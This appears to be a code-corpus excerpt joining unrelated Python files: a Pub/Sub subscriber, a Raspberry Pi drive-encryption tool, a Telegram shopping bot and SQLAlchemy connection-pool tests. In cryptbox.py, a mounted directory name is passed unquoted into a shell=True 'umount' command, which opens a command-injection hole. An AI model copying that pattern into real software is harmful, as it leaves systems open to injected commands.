from pubsub_controller.subscriber.pull.subscribe_multi import SubscribeMulti
SUBSCRIPTION_NAME = 'projects/' + GCP_PROJECT_ID + '/subscriptions/{unique}'
def subscribe_multi():
"""
メッセージを受け取って指定されたClassを実行する
Pub/subメッセージのattributeに {target: ClassName} を指定すると、
ClassNameのmainメソッドを実行する。
"""
SubscribeMulti.pull(SUBSCRIPTION_NAME.format(unique=SUBSCRIPTION_ID))
def subscriber_all_close(end=False):
"""
全てのSubscriberをCloseする。
"""
SubscribeMulti.close(end)
def sync_stop_subscriber(end=False):
"""
全てのSubscriberを停止する。(同期)
:param end: Subscriberを完全に終了するかどうか。
"""
t = threading.Thread(target=subscriber_all_close, args=(end,))
t.start()
t.join(timeout=60)
def main():
"""
常駐プロセスとして起動する。
指定されたSubscriberをThreadとして起動する。
"""
log('Start Pull Subscriber.')
def signal_handler(signum, stack):
"""
受け取ったSIGNALに応じて終了処理をハンドリングする。
:param signum: default
:param stack: default
"""
sync_stop_subscriber(end=True)
log('Stop Pull Subscriber. signal by {}'.format(signum))
exit(0)
# SIGNALに応じたハンドリング
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
threads = []
try:
threads.append(subscribe_multi)
for thread in threads:
t = threading.Thread(target=thread)
t.start()
# 定期的にSubscriberClose -> Openを繰り返す
while True:
time.sleep(POLLING_TIME)
sync_stop_subscriber()
except Exception as e:
error_log('Error Pull Subscriber. ... {}'.format(e))
exit(1)
if __name__ == '__main__':
main()
|
cryptbox.py
|
import os
import sys
import getpass
import pyinotify
import time
import argparse
import enum
import threading
import subprocess
import encrypt
if getpass.getuser() == "pi":
import RPi.GPIO as GPIO
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, public_key, led_manager):
self.public_key = public_key
self.led_manager = led_manager
def process_IN_CREATE(self, event):
if os.path.isdir(event.pathname):
print("New mounted volume detected: " + event.pathname)
# Wait for the volume to be mounted and avoid permission errors
time.sleep(1)
# Encrypt the volume
self.led_manager.set_state(CryptBoxState.ENCRYPTING)
try:
encrypt.run(event.pathname, event.pathname, self.public_key)
print("Finished volume encryption: " + event.pathname)
except Exception as e:
print(e)
self.led_manager.set_state(CryptBoxState.ERROR)
# Unmount the volume
try:
print("Syncing")
run_system_cmd("sync")
print("Unmounting " + event.pathname)
run_system_cmd("umount " + event.pathname)
except Exception as e:
print(e)
self.led_manager.set_state(CryptBoxState.ERROR)
# If everything went well, indicate success through the LED state
if self.led_manager.get_state() == CryptBoxState.ENCRYPTING:
self.led_manager.set_state(CryptBoxState.IDLE)
class CryptBoxState(enum.Enum):
""" CryptBox's operational states """
IDLE = 0
ENCRYPTING = 1
ERROR = 2
class RpiLed():
def __init__(self, pin):
""" Representation of a single LED connected to an RPi.
Arguments:
pin The RPi pin with BOARD numbering
"""
self.led_pin = pin
GPIO.setmode(GPIO.BOARD)
GPIO.setup(self.led_pin, GPIO.OUT)
GPIO.output(self.led_pin, GPIO.LOW)
def turn_on(self):
GPIO.output(self.led_pin, GPIO.HIGH)
def turn_off(self):
GPIO.output(self.led_pin, GPIO.LOW)
class LedManager():
def __init__(self, main_thread):
""" LED Manager's constructor, sets pin up using RPi.GPIO. """
# Monitor the main thread to stop if it has stopped
self.main_thread = main_thread
# Set the type of LED to use
self.led = RpiLed(40) if getpass.getuser() == "pi" else None
# Set the initial operational state
self.state = CryptBoxState.IDLE
def set_state(self, state):
""" Set the operational state using CryptBoxState. """
self.state = state
def get_state(self):
""" Get the currently set CryptBoxState. """
return self.state
def run(self):
""" The main business logic of the LED Manager.
Contains a blocking loop the controls the LED based on the internal
state machine.
"""
# If the LED type is not defined, then do nothing
if not self.led:
return
# Blink the LED differently depending on the operational state
while self.main_thread.is_alive():
if self.state == CryptBoxState.IDLE:
self.led.turn_on()
elif self.state == CryptBoxState.ENCRYPTING:
self.led.turn_on()
time.sleep(0.1)
self.led.turn_off()
time.sleep(1)
elif self.state == CryptBoxState.ERROR:
self.led.turn_on()
time.sleep(0.1)
self.led.turn_off()
time.sleep(0.3)
def run_system_cmd(cmd):
""" Run system command using the shell.
Arguments:
cmd The shell command to be run
Return:
0 Command was executed succefully
1 Command failed during execution
"""
try:
subprocess.check_output(cmd, stderr=subprocess.STDOUT,
shell=True, universal_newlines=True)
except subprocess.CalledProcessError as e:
print("ERROR:\n\n%s" % e.output)
return 1
return 0
def main():
parser_description = "CryptBox: Encrypt your drives on the fly"
parser = argparse.ArgumentParser(description=parser_description)
parser.add_argument("--mountpoint",
help="Path to where new volumes are mounted",
required=True)
parser.add_argument("--public-key",
help="Path to the public key", required=True)
args = parser.parse_args()
if not os.path.isdir(args.mountpoint):
print("Mountpoint does not exist or not a directory:", args.mountpoint)
sys.exit(1)
# Setup the Led Manager
main_thread = threading.current_thread()
led_manager = LedManager(main_thread)
led_thread = threading.Thread(target=led_manager.run)
led_thread.start()
# Setup pyInotify
wm = pyinotify.WatchManager() # Watch Manager
mask = pyinotify.IN_CREATE # watched events
notifier = pyinotify.Notifier(wm, EventHandler(args.public_key,
led_manager))
wdd = wm.add_watch(args.mountpoint, mask)
notifier.loop() # Blocking loop
led_thread.join()
if __name__ == "__main__":
main()
|
main.py
|
import settings
import telebot
import time
import threading
import logging
from compragamer import compragamer
logging.basicConfig(level=logging.INFO)
bot = telebot.TeleBot(settings.TOKEN)
chatids = []
@bot.message_handler(commands=['start', 'help'])
def start_help_handler(message):
logging.debug(msg="start received from {id}".format(id="message.chat.id"))
bot.reply_to(message, "hello!")
@bot.message_handler(commands=['ask'])
def ask_handler(message):
logging.debug(msg="ask received from {id}".format(id="message.chat.id"))
chatids.append((message.chat.id, message.text.partition(' ')[2]))
bot.reply_to(message, "ok")
def botpolling():
logging.info("Start Polling")
bot.polling()
threading.Thread(target=botpolling).start()
while True:
for id, criteria in chatids:
cg = compragamer()
articulos = cg.search(criteria)
for articulo in articulos:
bot.send_message(id, articulo)
time.sleep(int(settings.INTERVAL))
|
test_pool.py
|
import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
self._teardown_conns = []
def teardown(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.connection, c2.connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_threadconns",
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append("checkin")
event.listen(p, "checkin", checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.requires.predictable_gc
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ["checkin"])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
engine.execute(select(1)).close()
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
# test [ticket:2964]
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
# not have made it to the "checkout() event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
reaper = testing.engines.ConnectionKiller()
reaper.add_pool(p)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
reaper.assert_all_closed()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
